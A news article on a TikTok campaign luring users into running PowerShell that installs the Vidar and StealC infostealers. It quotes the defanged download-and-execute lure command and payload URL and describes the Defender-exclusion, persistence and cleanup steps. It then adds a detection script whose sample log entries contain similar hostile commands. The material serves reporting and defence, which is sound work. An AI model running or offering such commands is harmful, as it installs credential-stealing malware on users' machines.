
TikTok videos are the latest malware attack vector

Infostealer installed by users themselves

In addition to emails, websites, and USB sticks, malware is now also spreading via TikTok. Although indirect, the malicious instructions on the video platform can have serious consequences.

This is according to Trend Research, part of security company Trend Micro. The specific malware variants that malicious actors are promoting via TikTok are two infostealers, Vidar and StealC. The videos may be AI-generated, which would let the campaign scale quickly, spawn many variants, and vary its messaging.

TikTok’s algorithm significantly increases the likelihood of widespread exposure, according to the researchers, with one video reaching more than half a million views. This makes the platform an ideal tool for cybercriminals.

Social engineering via social media

Attackers have long used social media platforms for their attacks, and TikTok is no exception. However, previous campaigns used links to websites where malicious activity could be detected with traditional security software. Social engineering via TikTok is a different challenge, because the only point at which the attack can be detected is when the user executes the instructions in PowerShell.

Infostealers are also already very popular among cyber attackers. They have become an important tool for cybercriminals who collect login credentials, personal data, and other sensitive information that can then lead to identity theft, fraud, and data breaches.

In this new campaign, PowerShell, normally a legitimate administration tool, is used to get the payload onto a PC. The TikTok videos instruct users to execute malicious commands on their own systems.

How the attack works

Trend Research identified a TikTok user, @gitallowed, who posted several videos with the malicious instructions. Since then, more accounts with similar activities have been discovered, but these are no longer active. The attackers may be changing their accounts to circumvent bans.

In the most popular video (with over 500,000 views), the attacker presents a series of simple, step-by-step instructions that make the malicious process appear both legitimate and easy to follow: press Windows + R, type PowerShell, and execute the following command:

iex (irm hxxps://allaivo[.]me/spotify)

Malicious execution chain

The PowerShell command downloads and executes a script that then initiates a series of malicious actions. The script first creates hidden folders within the user’s AppData and LocalAppData folders and adds these locations to the Windows Defender exclusion list to bypass detection.

The script then fetches a secondary payload from hxxps://amssh[.]co/file.exe, which has been identified as Vidar or StealC malware, and stores it in the hidden folder. The script uses a retry mechanism to ensure that the payload is downloaded successfully and then launches the malware as a hidden, elevated process.

If the previous process is completed successfully, the script downloads an additional PowerShell script, stores it in the hidden folder, and ensures persistence by creating a registry key that executes the script at startup. Finally, temporary folders are deleted to minimize forensic traces.
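As an added example (not from the article or from Trend Research), the detection logic below scans constructed PowerShell script-block log entries for the behaviours in the chain just described. The cmdlet spellings, paths and the sample URL are assumptions about how such steps would typically appear in logs, not published indicators.

```python
import re

# Each behaviour from the described execution chain, mapped to a regex over
# PowerShell script-block text. Cmdlet spellings are assumptions, not published IoCs.
INDICATORS = {
    "remote_download_execute": re.compile(
        r"\b(iex|invoke-expression)\b.*\b(irm|invoke-restmethod|iwr|invoke-webrequest)\b", re.I),
    "defender_exclusion": re.compile(r"\badd-mppreference\b.*-exclusionpath\b", re.I),
    "hidden_appdata_folder": re.compile(
        r"\bnew-item\b.*\$env:(local)?appdata.*\bdirectory\b|\battrib\b.*\+h", re.I),
    "hidden_elevated_launch": re.compile(
        r"\bstart-process\b.*(-windowstyle\s+hidden|-verb\s+runas)", re.I),
    "run_key_persistence": re.compile(r"currentversion\\run\b", re.I),
    "forensic_cleanup": re.compile(r"\bremove-item\b.*\$env:temp\b", re.I),
}


def scan_script_block(text: str) -> list[str]:
    """Return the names of every indicator matched anywhere in one script block."""
    flat = " ".join(text.split())  # collapse newlines so multi-line scripts match
    return [name for name, rx in INDICATORS.items() if rx.search(flat)]


def is_suspicious(matched: list[str]) -> bool:
    """The download-and-execute one-liner is the entry point, so it alone is enough.
    Later behaviours are legitimate on their own (admins set exclusions and Run keys),
    so any two of them together are required before flagging."""
    return "remote_download_execute" in matched or len(matched) >= 2


def triage(events: dict[str, str]) -> dict[str, tuple[bool, list[str]]]:
    """Map each event id to (suspicious?, matched indicators)."""
    out = {}
    for event_id, text in events.items():
        matched = scan_script_block(text)
        out[event_id] = (is_suspicious(matched), matched)
    return out


# Constructed sample script-block log entries (not real captures; placeholder URL).
SAMPLE_EVENTS = {
    "evt-1": "Get-ChildItem $env:USERPROFILE\\Documents -Recurse | Measure-Object",
    "evt-2": "iex (irm https://example.invalid/spotify)",
    "evt-3": 'Add-MpPreference -ExclusionPath "$env:LOCALAPPDATA\\svc"; '
             'Start-Process "$env:LOCALAPPDATA\\svc\\file.exe" -WindowStyle Hidden',
    "evt-4": 'Set-ItemProperty "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" '
             '-Name Updater -Value "$env:APPDATA\\u.ps1"',
}

if __name__ == "__main__":
    for eid, (flag, hits) in triage(SAMPLE_EVENTS).items():
        print(f"{eid}: {'SUSPICIOUS' if flag else 'ok'} {hits}")
```

Note that evt-4 is not flagged on its own: a Run-key write is common for legitimate software, so the threshold only trips when it appears alongside another chain behaviour.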

Security implications

The shift to social media as a distribution mechanism for malware requires a review of security measures, Trend Research notes. Traditional controls are currently ineffective against this form of social engineering. It is an open question what else can be done to prevent attacks when the instructions are simply distributed via TikTok; sometimes, security awareness training is the only available control. It is up to the security industry to prove otherwise.

The mitigation may be unclear, but the consequences are crystal clear. Companies can be affected by data exfiltration, theft of login credentials, and possible compromise of sensitive systems as a result of this threat.